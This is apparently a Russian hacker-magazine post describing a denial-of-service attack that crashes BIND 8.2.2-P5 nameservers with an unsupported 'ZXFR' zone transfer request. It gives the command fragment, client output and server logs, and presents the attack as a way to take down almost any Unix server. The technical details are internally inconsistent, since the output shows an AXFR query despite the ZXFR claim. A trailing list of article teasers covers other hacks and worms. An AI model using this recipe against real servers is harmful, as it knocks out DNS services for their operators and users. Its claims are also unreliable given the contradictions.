Привет перцы))
Новая дырка в Bind 8.2.2-P5 позволяет уронить практически любой *NIX, суть в следующем: bind безнадежно умирает после запроса с неизвестным типом передачи зоны (ну типа ZXFR).
zone to transfer: zone.pipez.com
dns server: dns.pipez.com 192.168.1.1
me: some.sucker.com 10.10.10.10
Посылаем запрос с ключом "-Z" ,подразумевается ,что мы желаем юзать ZXFR. Но прикол в том, что dns.pipez.com не поддерживает ZXFR и имеет не отконфигуренный "allow-transfer{}" и любой герой может запросить zone.pipez.com.
Пример:
-Z dns.pipez.com
named-xfer[29297]: send AXFR query 0 to 192.168.1.1
named-xfer[29297]: premature EOF, fetching "zone.pipez.com".
Лог сервера таков:
Nov 8 13:29:09 dns.pipez.com: named[188510]: approved ZXFR from [10.10.10.10].2284 for "zone.pipez.com"
Nov 8 13:29:09 dns.pipez.com: named[188510]: unsupported XFR (type ZXFR) of "zone.pipez.com" (IN) to [10.10.10.10].2284
Все - сервак в глубоком ауте)).
-
Admin vs Nimda
Сетевой червь, использующий довольно старую дыру (21 марта) в Outlook Express, за нескольк… -
Клинское Party Zone 2001
Как грамотно отдохнуть с пивом "Клинское" или отчёт о правильно проведённых праздниках. Чт… -
Клинское Party Zone. Апрель.
Клинское Party Zone 2001. Апрель. Начало апреля для вечеринок серии Клинское Party Zone 20… -
Клинское Party Zone 2001 (Part II).
Клинское Party Zone 2001 (Part II) Ну вот, весна уже вступила в свои права, наступил долго… -
Клинское Party Zone 2001. Конец марта.
Клинское Party Zone 2001. Конец марта. В конце марта очередная тусовка из серии Клинское P… -
Клинское Party Zone 2001. Конец апреля.
Клинское Party Zone 2001. Конец апреля. 20 и 21 апреля сего года пиво-безалкогольные мероп…
-
-
Установка eggdrop на IRC
После предыдущих статей про IRC обрушился просто лавинный поток писем, львиная часть котор… -
Удаленный взлом нейм-сервера
Cегодня я расскажу как заломать RedHat Linux 6.* на котором гоняется нэйм-сервер bind верс… -
Хак с самого начала
Так вот начнем. Как же надо хакать и с чего начать? Для начала попробуй просканировать нес… -
Что такое WebMoney
Интернет постоянно растет и развивается. Куча фирм предоставляет различные услуги в интерн… -
Дырка в Microsoft Exchange 5.5
Что бы по быстренькому организовать DoS атаку сервер с Microsoft Exchange 5.